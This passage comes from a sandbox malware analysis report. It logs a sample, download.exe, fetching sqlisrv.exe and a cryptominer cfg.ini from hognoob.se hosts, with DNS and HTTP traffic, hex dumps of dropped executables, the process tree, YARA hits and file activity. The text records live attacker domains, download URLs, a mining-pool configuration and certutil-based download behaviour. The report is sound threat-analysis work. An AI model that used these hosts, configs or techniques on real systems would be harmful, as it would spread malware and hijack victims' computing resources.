May 16, 2019 17:17:45.178095102 CEST
8.8.8.8 192.168.2.5 0x4023 No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)
May 16, 2019 17:17:46.642884970 CEST
8.8.8.8 192.168.2.5 0x2ca7 No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)
May 16, 2019 17:18:06.555711985 CEST
8.8.8.8 192.168.2.5 0x6522 No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)
May 16, 2019 17:18:08.994851112 CEST
8.8.8.8 192.168.2.5 0xddac No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:18:11.550880909 CEST
8.8.8.8 192.168.2.5 0xffac No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:18:14.258923054 CEST
8.8.8.8 192.168.2.5 0x612a No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
fid.hognoob.seuio.hognoob.se:63145
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.2.5 49797 45.67.14.164 80 C:\Users\user\Desktop\download.exe
HTTP Request Dependency Graph
HTTP Packets
Copyright Joe Security LLC 2019 Page 46 of 69
TimestampkBytestransferred Direction Data
May 16, 2019 17:15:39.184736013 CEST
0 OUT GET /sqlisrv.exe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: fid.hognoob.seCache-Control: no-cache
May 16, 2019 17:15:39.233145952 CEST
2 IN HTTP/1.1 200 OKServer: nginxDate: Thu, 16 May 2019 15:15:39 GMTContent-Type: application/octet-streamContent-Length: 4672000Last-Modified: Tue, 14 May 2019 19:53:23 GMTConnection: keep-aliveETag: "5cdb1cb3-474a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d fd 52 69 63 68 7e d6 5d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 13 db 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 50 47 00 00 10 00 00 00 b0 18 00 f0 ff 5f 00 00 c0 18 00 00 10 60 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 60 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 60 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 b0 18 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 50 47 00 00 c0 18 00 00 42 47 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 10 60 00 00 04 00 00 00 46 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:3~]~]~]Q{]Vw]Wx]SR](NR]|]~\]Nc]HW]HV]V]We]~]*][]Rich~]PEL\PG_`@ ``|UPX0UPX1PGBG@UPX2`FG@
Session ID Source IP Source Port Destination IP Destination Port Process
1 192.168.2.5 49801 45.67.14.164 80 C:\Users\user\Desktop\download.exe
TimestampkBytestransferred Direction Data
May 16, 2019 17:15:44.320504904 CEST
4880 OUT GET /sqlisrv.exe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: fid.hognoob.se
Copyright Joe Security LLC 2019 Page 47 of 69
May 16, 2019 17:15:44.368107080 CEST
4881 IN HTTP/1.1 200 OKServer: nginxDate: Thu, 16 May 2019 15:15:44 GMTContent-Type: application/octet-streamContent-Length: 4672000Last-Modified: Tue, 14 May 2019 19:53:23 GMTConnection: keep-aliveETag: "5cdb1cb3-474a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d fd 52 69 63 68 7e d6 5d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 13 db 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 50 47 00 00 10 00 00 00 b0 18 00 f0 ff 5f 00 00 c0 18 00 00 10 60 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 60 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 60 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 b0 18 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 50 47 00 00 c0 18 00 00 42 47 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 10 60 00 00 04 00 00 00 46 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:3~]~]~]Q{]Vw]Wx]SR](NR]|]~\]Nc]HW]HV]V]We]~]*][]Rich~]PEL\PG_`@ ``|UPX0UPX1PGBG@UPX2`FG@
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
2 192.168.2.5 49804 45.67.14.164 80 C:\Users\user\Desktop\download.exe
TimestampkBytestransferred Direction Data
May 16, 2019 17:15:47.054552078 CEST
9701 OUT GET /sqlisrv.exe HTTP/1.1Accept: */*User-Agent: CertUtil URL AgentHost: fid.hognoob.seCache-Control: no-cache
May 16, 2019 17:15:47.101970911 CEST
9702 IN HTTP/1.1 200 OKServer: nginxDate: Thu, 16 May 2019 15:15:47 GMTContent-Type: application/octet-streamContent-Length: 4672000Last-Modified: Tue, 14 May 2019 19:53:23 GMTConnection: keep-aliveETag: "5cdb1cb3-474a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d fd 52 69 63 68 7e d6 5d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 13 db 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 50 47 00 00 10 00 00 00 b0 18 00 f0 ff 5f 00 00 c0 18 00 00 10 60 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 60 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 60 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 b0 18 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 50 47 00 00 c0 18 00 00 42 47 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 10 60 00 00 04 00 00 00 46 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:3~]~]~]Q{]Vw]Wx]SR](NR]|]~\]Nc]HW]HV]V]We]~]*][]Rich~]PEL\PG_`@ ``|UPX0UPX1PGBG@UPX2`FG@
Copyright Joe Security LLC 2019 Page 48 of 69
Code Manipulations
Statistics
Behavior
• download.exe
• qwr4rt.exe
• ycemck.exe
• sqlisrv.exe
• cmd.exe
• cmd.exe
• conhost.exe
• conhost.exe
• PING.EXE
• certutil.exe
• b158ac7.exe
• b158ac7.exe
• cmd.exe
Session ID Source IP Source Port Destination IP Destination Port Process
3 192.168.2.5 49808 195.128.126.120 63145 C:\Windows\cc3d3243\b158ac7.exe
TimestampkBytestransferred Direction Data
May 16, 2019 17:15:53.229324102 CEST
14580 OUT GET /cfg.ini HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: uio.hognoob.se:63145Cache-Control: no-cache
May 16, 2019 17:15:53.290889025 CEST
14581 IN HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 14 May 2019 20:09:55 GMTAccept-Ranges: bytesETag: "867ebbff90ad51:0"Server: Microsoft-IIS/7.5Date: Thu, 16 May 2019 15:15:55 GMTContent-Length: 299Data Raw: 5b 55 70 64 61 74 65 4e 6f 64 65 5d 0d 0a 4e 6f 64 65 31 3d 75 70 61 31 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 4e 6f 64 65 32 3d 75 70 61 32 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 5b 4d 61 69 6e 55 70 64 61 74 65 5d 0d 0a 4d 61 69 6e 56 65 72 73 69 6f 6e 3d 32 30 31 39 30 35 31 35 0d 0a 4d 61 69 6e 45 78 65 4e 61 6d 65 3d 65 76 65 6e 73 76 63 0d 0a 4d 61 69 6e 53 69 7a 65 3d 34 36 37 32 30 30 30 0d 0a 5b 44 6f 77 6e 6c 6f 61 64 5d 0d 0a 55 72 6c 3d 68 74 74 70 3a 2f 2f 66 69 64 2e 68 6f 67 6e 6f 6f 62 2e 73 65 2f 64 6f 77 6e 6c 6f 61 64 2e 65 78 65 0d 0a 5b 4d 69 6e 49 6e 67 5d 0d 0a 4d 69 6e 65 55 70 64 61 74 65 3d 6f 66 66 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 42 61 63 6b 55 70 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 43 50 55 4f 63 63 75 50 61 6e 63 79 3d 31 Data Ascii: [UpdateNode]Node1=upa1.hognoob.seNode2=upa2.hognoob.se[MainUpdate]MainVersion=20190515MainExeName=evensvcMainSize=4672000[Download]Url=http://fid.hognoob.se/download.exe[MinIng]MineUpdate=offMiningPool=pxx.hognoob.se:35789MiningPoolBackUp=pxx.hognoob.se:35789CPUOccuPancy=1
May 16, 2019 17:15:53.295945883 CEST
14581 OUT GET /cfg.ini HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: uio.hognoob.se:63145Cache-Control: no-cache
May 16, 2019 17:15:53.355729103 CEST
14582 IN HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 14 May 2019 20:09:55 GMTAccept-Ranges: bytesETag: "867ebbff90ad51:0"Server: Microsoft-IIS/7.5Date: Thu, 16 May 2019 15:15:55 GMTContent-Length: 299Data Raw: 5b 55 70 64 61 74 65 4e 6f 64 65 5d 0d 0a 4e 6f 64 65 31 3d 75 70 61 31 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 4e 6f 64 65 32 3d 75 70 61 32 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 5b 4d 61 69 6e 55 70 64 61 74 65 5d 0d 0a 4d 61 69 6e 56 65 72 73 69 6f 6e 3d 32 30 31 39 30 35 31 35 0d 0a 4d 61 69 6e 45 78 65 4e 61 6d 65 3d 65 76 65 6e 73 76 63 0d 0a 4d 61 69 6e 53 69 7a 65 3d 34 36 37 32 30 30 30 0d 0a 5b 44 6f 77 6e 6c 6f 61 64 5d 0d 0a 55 72 6c 3d 68 74 74 70 3a 2f 2f 66 69 64 2e 68 6f 67 6e 6f 6f 62 2e 73 65 2f 64 6f 77 6e 6c 6f 61 64 2e 65 78 65 0d 0a 5b 4d 69 6e 49 6e 67 5d 0d 0a 4d 69 6e 65 55 70 64 61 74 65 3d 6f 66 66 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 42 61 63 6b 55 70 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 43 50 55 4f 63 63 75 50 61 6e 63 79 3d 31 Data Ascii: [UpdateNode]Node1=upa1.hognoob.seNode2=upa2.hognoob.se[MainUpdate]MainVersion=20190515MainExeName=evensvcMainSize=4672000[Download]Url=http://fid.hognoob.se/download.exe[MinIng]MineUpdate=offMiningPool=pxx.hognoob.se:35789MiningPoolBackUp=pxx.hognoob.se:35789CPUOccuPancy=1
Copyright Joe Security LLC 2019 Page 49 of 69
• conhost.exe
• cmd.exe
• cacls.exe
• netsh.exe
• conhost.exe
• netsh.exe
• conhost.exe
• cmd.exe
• cacls.exe
• cmd.exe
• cacls.exe
• sqlisrv.exe
• cmd.exe
• conhost.exe
• GogoleUpadte.exe
• cmd.exe
• cmd.exe
• conhost.exe
• conhost.exe
• vfshost.exe
• ouousbpro.exe
• cmd.exe
• cmd.exe
• conhost.exe
Click to jump to process
System Behavior
File ActivitiesFile Activities
Start time: 17:15:36
Start date: 16/05/2019
Path: C:\Users\user\Desktop\download.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\download.exe'
Imagebase: 0x400000
File size: 322560 bytes
MD5 hash: 31E46700743FAA4304532B36311E1177
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches: Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.5123455439.0000000000767000.00000004.sdmp, Author: Florian RothRule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.5112633665.0000000000540000.00000004.sdmp, Author: Florian RothRule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.5104166883.0000000000401000.00000040.sdmp, Author: Florian Roth
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\WebKitSdk\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 401CAF CreateDirectoryA
Analysis Process: download.exe PID: 3076 Parent PID: 3220Analysis Process: download.exe PID: 3076 Parent PID: 3220
General
File CreatedFile Created
Copyright Joe Security LLC 2019 Page 50 of 69
C:\WebKitSdk\2.25.14\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 401CAF CreateDirectoryA
C:\WebKitSdk\2.25.14\qwr4rt.exe read attributes | synchronize | generic write
normal synchronous io non alert | non directory file
success or wait 1 470034 CreateFileA
C:\WebKitSdk\2.25.14\sqlisrv.exe read attributes | synchronize | generic write
normal synchronous io non alert | non directory file
success or wait 1 470034 CreateFileA
C:\Users\user\AppData\Local\Temp\509703 read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 4016C1 CreateDirectoryA
C:\Users\user\AppData\Local\Temp\509703\....\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 4016FE CreateDirectoryA
C:\Users\user\AppData\Local\Temp\509718 read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 4016C1 CreateDirectoryA
C:\Users\user\AppData\Local\Temp\509718\....\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 4016FE CreateDirectoryA
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Completion CountSourceAddress Symbol
C:\Users\user\AppData\Local\Temp\509718\TemporaryFile\TemporaryFile cannot delete 1 417156 DeleteFileA
Old File Path New File Path Completion CountSourceAddress Symbol
C:\Users\user\AppData\Local\Temp\509703\.... C:\Users\user\AppData\Local\Temp\509703\TemporaryFile success or wait 1 4017B2 MoveFileA
C:\Users\user\Desktop\download.exe C:\Users\user\AppData\Local\Temp\509718\....\TemporaryFile success or wait 1 40174D MoveFileA
C:\Users\user\AppData\Local\Temp\509718\.... C:\Users\user\AppData\Local\Temp\509718\TemporaryFile success or wait 1 4017B2 MoveFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File DeletedFile Deleted
File MovedFile Moved
File WrittenFile Written
Copyright Joe Security LLC 2019 Page 51 of 69
C:\WebKitSdk\2.25.14\qwr4rt.exe unknown 73728 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 6d de 5c 65 0c b0 0f 65 0c b0 0f 65 0c b0 0f 1e 10 bc 0f 64 0c b0 0f a6 03 ed 0f 63 0c b0 0f e6 10 be 0f 64 0c b0 0f 0a 13 bb 0f 64 0c b0 0f 0a 13 ba 0f 6e 0c b0 0f 0a 13 b4 0f 67 0c b0 0f 53 2a bb 0f 66 0c b0 0f 53 2a b4 0f 66 0c b0 0f 65 0c b1 0f 6e 0d b0 0f 8d 13 bb 0f 6c 0c b0 0f a2 0a b6 0f 64 0c b0 0f 52 69 63 68 65 0c b0 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche..................
success or wait 1 4700CB WriteFile
C:\WebKitSdk\2.25.14\sqlisrv.exe unknown 4672000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...]
success or wait 1 4700CB WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
Start time: 17:15:36
Start date: 16/05/2019
Path: C:\WebKitSdk\2.25.14\qwr4rt.exe
Analysis Process: qwr4rt.exe PID: 3308 Parent PID: 3076Analysis Process: qwr4rt.exe PID: 3308 Parent PID: 3076
General
Copyright Joe Security LLC 2019 Page 52 of 69
File ActivitiesFile Activities
Registry ActivitiesRegistry Activities
Wow64 process (32bit): true
Commandline: C:\WebKitSdk\2.25.14\qwr4rt.exe
Imagebase: 0x400000
File size: 73728 bytes
MD5 hash: EABDC54C61088B769E9AF917AA6B05A4
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches: Detection: 100%, AviraDetection: 79%, virustotal, Browse
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\Windows\SysWOW64\ycemck.exe read data or list directory | read attributes | delete | write dac | synchronize | generic read | generic write
archive sequential only | non directory file
success or wait 1 100033DA CopyFileA
Old File Path New File Path Completion CountSourceAddress Symbol
C:\WebKitSdk\2.25.14\qwr4rt.exe C:\Windows\SysWOW64\506281.bak success or wait 1 10002093 MoveFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
